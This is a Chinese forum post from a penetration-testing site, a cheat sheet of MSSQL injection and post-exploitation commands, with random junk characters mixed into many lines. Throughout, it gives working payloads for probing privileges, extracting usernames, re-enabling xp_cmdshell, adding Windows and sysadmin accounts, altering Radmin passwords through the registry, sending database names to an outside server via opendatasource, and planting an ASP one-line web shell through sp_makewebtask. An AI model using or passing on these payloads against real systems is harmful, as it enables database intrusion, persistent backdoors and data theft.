中国网络渗透测试联盟

标题: 常用的一些注入命令 [打印本页]

作者: admin    时间: 2012-9-15 14:40
标题: 常用的一些注入命令
//看看是什么权限的
1 Q" |: B" H. t+ y# Iand 1=(Select IS_MEMBER('db_owner'))
/ c3 t5 {5 I4 ?0 Z7 z/ ~And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--" b& p" ]; C; K& w- Y1 S

& n) J2 D& g) A) n' a) d! ?  o//检测是否有读取某数据库的权限
7 q, s" ~0 c7 ~and 1= (Select HAS_DBACCESS('master'))
8 x1 N& ~& j1 o; L0 f, O4 sAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
0 U) |' O5 Q, q) Y! ?4 s, h7 s% L; S/ r

" n  k, C9 G0 g; h# c- U9 u数字类型
6 Q6 C8 s% R7 k% i! `! v; pand char(124)%2Buser%2Bchar(124)=0
# s9 _$ {9 ?! B3 @/ I' s% K( p; B  ~. x9 I: D8 @/ X, o2 a
字符类型9 C1 C$ Y. n! F/ x$ r
' and char(124)%2Buser%2Bchar(124)=0 and ''='- [5 H5 N- a2 C7 o3 o) \

5 {. r) Q8 `. s3 \/ X搜索类型
, |: w1 q; O4 j' and char(124)%2Buser%2Bchar(124)=0 and '%'='3 i5 `8 s7 W8 R

# T. c9 d$ B: V爆用户名
: S" W5 s$ [3 X) U- A& G$ M  B3 ]and user>0
( [3 G6 @9 ]' `' and user>0 and ''='! u" B% o6 `$ V1 ~. T6 J$ ]
, i6 M5 o/ D5 Y) o# p: S$ R
检测是否为SA权限
8 v, L- V2 \# J, @) }  e+ y& Land 1=(select IS_SRVROLEMEMBER('sysadmin'));--
  l) V- ]$ {6 L! i. yAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
- p9 \. v3 x* C8 o) Q/ G% ^) H: C
, O. r4 _" B/ u# \, @. ~检测是不是MSSQL数据库
( a1 Y6 M) ?. I$ o1 v5 hand exists (select * from sysobjects);--2 P7 }' A0 }8 G8 j- L' y$ E

1 M+ R2 P& Y9 l检测是否支持多行
5 ~* ^6 L' L  o- y0 _;declare @d int;--* r. q' e4 N9 _, d" `

7 n% k" e9 d% v  N/ P, `恢复 xp_cmdshell
" d& N. X1 I( D! t" v, A' ~;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
! t* j! L9 G# K7 h$ ^
4 v' d; m" G% n
8 F; o% O, D5 kselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
6 }- v) S5 E9 `8 Z+ u* K
! }9 i, c2 T& s! k* I/ P//-----------------------
; K' G1 s$ Q" N" x1 k  d. H, X! b//       执行命令
1 y0 p6 a& ?+ k/ ~  L: V//-----------------------
1 T, d3 U8 `' e. z首先开启沙盘模式:
, l/ Y+ {. s/ U5 {! F$ Uexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
# J3 D' o, `  [& M5 ~
! v6 m0 @; P+ S2 s2 U. t: v然后利用jet.oledb执行系统命令
7 T; Z0 b8 I! K6 ~2 U8 wselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
5 m. y. q+ h2 G4 F
5 u' o% `1 F* u. O0 @' `8 U执行命令9 ^( f# g( B4 z
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--5 W/ L7 j. o7 `* l' D

* w- @& D  ?8 R# }! C6 |4 jEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
/ n$ G4 t6 d7 W
3 s7 ?/ T- f& L& R: `8 M1 w判断xp_cmdshell扩展存储过程是否存在:
( }" r3 Q! P- B& f9 U2 j8 l5 y; D9 Rhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')3 Q! O5 P- Y* m3 _

  N( z9 h* v+ ~+ }4 s+ e写注册表/ Q8 k1 T9 m9 I0 V, Y# ^
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1! p7 Y$ e6 V+ P, h
' u! H! J4 J" t% Y
REG_SZ  ^; \1 s3 |) G+ j1 I6 p$ k

, ^7 V8 d+ i2 g! h7 |; f读注册表
9 n: y8 l) p9 `# }% |( Eexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
: a, v: K/ f3 A8 N, J0 i# O; @% U+ S5 F% A. T% s1 o
读取目录内容
# x% Z& f8 w: h7 |% Yexec master..xp_dirtree 'c:\winnt\system32\',1,1
) s6 B0 [' [0 i0 ]# G
+ x7 e" \7 p: Y, H9 A% {& Y2 q, O- K. a! g+ o) ^0 w, g' ]* y0 Z
数据库备份
/ z6 W7 J% x7 t! Lbackup database pubs to disk = 'c:\123.bak'7 l' u2 K) `4 I+ |, o* @+ q/ [

% f# l; T0 T. F! |3 ^% T' d//爆出长度
& h  X" B" ^; U$ i; r" U* ^4 UAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--& R  v' X3 S$ k( D0 M$ l' P

: H  k4 t2 R8 `/ X# U
+ y- Q) i. n( _* u9 E
) G, [2 t. y, d8 v; _3 {) u更改sa口令方法:用sql综合利用工具连接后,执行命令:
' H) I1 X; S9 T0 `' z6 B* ~exec sp_password NULL,'新密码','sa'
0 R: D2 }& A2 ~4 P, M# T1 X1 \9 H9 w6 w6 M2 k7 y
添加和删除一个SA权限的用户test:: r8 `0 c0 L9 ~: i; J0 B& v
exec master.dbo.sp_addlogin test,95307723 F& ^8 Y, V: v+ L+ c' \
exec master.dbo.sp_addsrvrolemember test,sysadmin# @# j* D2 B* g: b' ^* X  z

5 Z) y0 ]( d) Q" _删除扩展存储过过程xp_cmdshell的语句:" k5 @2 K. M, R& G. h  F
exec sp_dropextendedproc 'xp_cmdshell'
0 g4 n0 L( R  L
6 S7 W2 X9 Y7 B% A( S+ _添加扩展存储过过程
. ?5 T( N0 g) X( Q% WEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
0 X6 `3 }- v# U2 f0 _+ x7 JGRANT exec On xp_proxiedadata TO public
& T" S* b: M' y
6 z3 Z2 J. T" ~" H1 {2 i8 T& N' U4 s
停掉或激活某个服务。* ^0 ]0 p: ^4 s* m3 ?( W
8 @3 t; \$ [+ h8 H; W( C* u
exec master..xp_servicecontrol 'stop','schedule'5 q' i; w. i; _4 \7 g- ^
exec master..xp_servicecontrol 'start','schedule': P' h- s. t9 A  \
( p( ~8 s( b* u3 H
dbo.xp_subdirs9 V- K: e) M# w0 U$ d

+ c$ B' X1 c4 z/ m5 d( f! m只列某个目录下的子目录。
* R; n5 ]. e0 @- v( e1 {* wxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'" m: E' ~3 p5 F7 i: H, Q, d, _! ?
( h9 B& [' B9 [/ X2 [; B2 @- K
dbo.xp_makecab
9 B; r0 ?3 E5 ^( e% ^; i' \7 M1 s: y- A
将目标多个档案压缩到某个目标档案之内。
2 o, j' B2 G1 \, W: t所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
! d$ x. h! }% B' v$ C; {+ W& D" L
, S4 J) |" ^9 R& ^2 Cdbo.xp_makecab5 c5 h  d1 Q9 l0 [5 {* C% `% \
'c:\test.cab','mszip',1,% h5 N+ b7 r9 {1 I1 L: a7 j
'C:\Inetpub\wwwroot\SQLInject\login.asp',, A/ I' h6 C9 s" S* Y5 Z: G
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'9 o" Z3 [# C$ \. L- H6 I* }
, c. G# V; \0 l0 e
xp_terminate_process* e2 M4 h0 y/ m7 s) J! J. E  V

( z( Z9 a; w$ c; C停掉某个执行中的程序,但赋予的参数是 Process ID。
% N+ r# a. h* K" z1 y+ n利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
  |; ?1 j' M9 A
& _# ~- T: y9 X- @: Ixp_terminate_process 24847 F' ~0 W' J; J! q
4 r9 i0 C- I7 s/ l
xp_unpackcab+ _' Z9 z. X3 L8 T& |7 d- i: C9 x

' q5 C/ f1 F% l. [$ ?9 h  [解开压缩档。& [; M/ I- C  j& T

1 X4 \$ A7 ?; L6 _  _xp_unpackcab 'c:\test.cab','c:\temp',1
5 Z" n6 Y! G8 L
; X) P1 c- ]4 U" b" B+ t5 R
* ?8 L$ k9 U$ a& u) z5 ~  f某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12343 e9 O7 G) X' _( s% D+ \, E

5 s2 |. v8 U% n- Y2 W- ycreate database lcx;4 L/ K5 j" V" u: f
Create TABLE ku(name nvarchar(256) null);
4 b, i. A% C3 s- p" oCreate TABLE biao(id int NULL,name nvarchar(256) null);6 @7 ^8 Z: d5 i8 v* b* k( ~. o
1 E6 c2 ]. W7 ?  q+ O
//得到数据库名
" D$ o7 t7 X  x6 jinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
# F2 D: F3 C. F8 P4 A9 O; A9 F- H2 j; w( g5 C8 Y
& |2 D. S& ?. S. K" a
//在Master中创建表,看看权限怎样
8 d' F  q& Z/ o% X+ G* v: TCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--6 n1 a" }3 E" J/ b( m
3 I3 Y3 G3 V1 [5 @
用 sp_makewebtask直接在web目录里写入一句话马:' J) ^/ s- |2 l  D
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--" G. P  T) H1 M! l2 p  f, x
5 ~" S$ E% [" M% j! Q+ D
//更新表内容) v# Z0 c; i& i: o- Y5 r
Update films SET kind = 'Dramatic' Where id = 123( E7 n* F$ e0 z# W* c7 g
6 Q/ c! _. v* W$ T0 y, G0 P
//删除内容6 v6 `% N3 S8 t* u
delete from table_name where Stockid = 3




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2